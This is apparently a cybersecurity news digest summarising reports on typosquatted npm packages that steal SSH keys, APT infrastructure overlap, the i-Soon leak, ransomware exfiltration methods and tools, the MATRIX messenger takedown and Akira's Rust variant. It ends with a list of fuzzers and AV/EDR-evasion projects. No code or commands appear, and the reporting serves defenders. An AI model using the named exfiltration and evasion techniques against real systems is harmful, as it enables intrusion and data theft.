Random in Security is a summary of the cybersecurity news.
Interesting Reads#
Typosquatted npm Packages Inject SSH Backdoor#
Socket recently discovered several malicious npm packages that used typosquatting to mimic popular libraries. Once installed, these packages exfiltrated SSH private keys and known hosts by modifying shell profiles (.bashrc, .zshrc) to execute backdoor scripts. The attack primarily targeted developers on macOS and Linux systems, and the packages were downloaded hundreds of times before being removed. Unlike previous cases focused on credential harvesting or crypto mining, this campaign directly compromises developer machines at the OS level, potentially giving attackers access to internal infrastructure or CI/CD pipelines.
Chinese cyber offensive ecosystem#
Orange Cyberdefense uncovered a fascinating overlap in infrastructure used by two seemingly unrelated APT groups—Turla and StrongPity. By analyzing historical DNS resolutions and TLS certificates, the team discovered reused or repurposed IP addresses and domains pointing to possible shared logistics or staging servers. While not conclusive evidence of collaboration, it raises questions about coordination, false flags, or even compromised attacker infrastructure.
In this light, I would like to highlight the article by Margin Research, that examines the implications of a significant leak involving Shanghai Anxun Information Co. (i-Soon), a Chinese cybersecurity contractor. This leak, which surfaced on February 16, 2024, includes internal documents, chat logs, and sales pitches, shedding light on China’s offensive cyber capabilities and drawing parallels to Western entities like NSO Group and Hacking Team.
Ransomware-driven data exfiltration: techniques and implications#
This comprehensive CERT-EU report analyzes data exfiltration techniques used by ransomware operators, with a focus on the “double extortion” model. It details common tools (like Rclone, MEGA clients, FTP/SFTP scripts), novel exfiltration methods (e.g., Telegram bots, Slack APIs), and staging tactics used to avoid detection. The report also outlines the operational shift toward exfiltration-first strategies, where data theft precedes encryption—or even replaces it entirely. Ransomware groups are increasingly operating like mature data breach actors, prioritizing stealthy exfiltration over noisy encryption.
Operation Passionflower#
MATRIX messenger has been shut down by a law enforcement Operation Passionflower. This is not to be confused with Matrix protocol. MATRIX is similar to Sky ECC and EncroChat.
The press release by Europol only mentions “innovative technology” were used to intercept and decrypt messages. In three months law enforcement tracked 2.3 million messages. Also, the created a nice operation-passionflower.com
Akira Rust Ransomware#
Check Point analyzed a new Rust-based variant of Akira ransomware, marking a shift from the group’s earlier C++ codebase. While functionally similar—handling encryption, lateral movement, and ransom note deployment—the Rust version offers improved cross-platform capabilities, smaller file size, and harder-to-detect obfuscation. The operators also made specific adjustments to avoid encrypting Linux root directories, a mistake seen in earlier campaigns. This mirrors a broader trend: ransomware groups adopting Rust and Go for better evasion, faster development, and easier multi-platform targeting.
Tools#
- Surveillance Watch - They Know Who You Are
- fuffme - Target practice for ffuf
- bunbuster - Ridiculously fast web & TCP fuzzer designed for brute-forcing directories, subdomains, and files on web servers
- atomicgen.io - A simple tool designed to create Atomic Red Team tests with ease
- SuperdEye - Indirect Syscall with TartarusGate Approach in Go
- Acheron - Indirect syscalls for AV/EDR evasion in Go assembly
- BananaPhone - It’s a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)
- Hell’s Gate - Original C Implementation of the Hell’s Gate VX Technique